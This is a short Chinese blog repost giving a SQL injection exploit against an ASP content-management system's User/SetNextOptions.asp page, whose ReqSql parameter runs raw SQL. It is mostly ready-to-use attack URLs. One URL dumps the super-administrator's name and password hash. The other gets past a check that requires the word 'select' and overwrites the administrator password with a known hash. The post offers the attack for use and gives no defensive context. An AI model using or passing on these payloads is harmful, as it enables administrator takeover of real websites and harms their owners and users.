转自：http://hi.baidu.com/xcrypt/blog/item/6b95d4237f6b4041ad34de9b.html

不多说，利用方式如下：
http://127.0.0.1:88/User/SetNextOptions.asp?sType=1&ReqSql=select top 1 admin_Name,Admin_Pass_Word from FS_MF_Admin where Admin_Is_Super=1




若管理员密码查询不到，那update一下
if instr(lcase(ReqSql),"select ")=0 then
response.Write("系统错误，请联系管理员。")
response.End()
end if
ReqSql参数中一定要有select，于是构造如下语句：
http://127.0.0.1:88/User/SetNextOptions.asp?ReqSql=update FS_MF_Admin set Admin_Pass_Word='49ba59abbe56e057' where id=(select top 1 id from FS_MF_Admin where Admin_Is_Super=1)

执行以后页面可能会一直在执行，但只需等待几秒，管理员的密码就会被改掉了。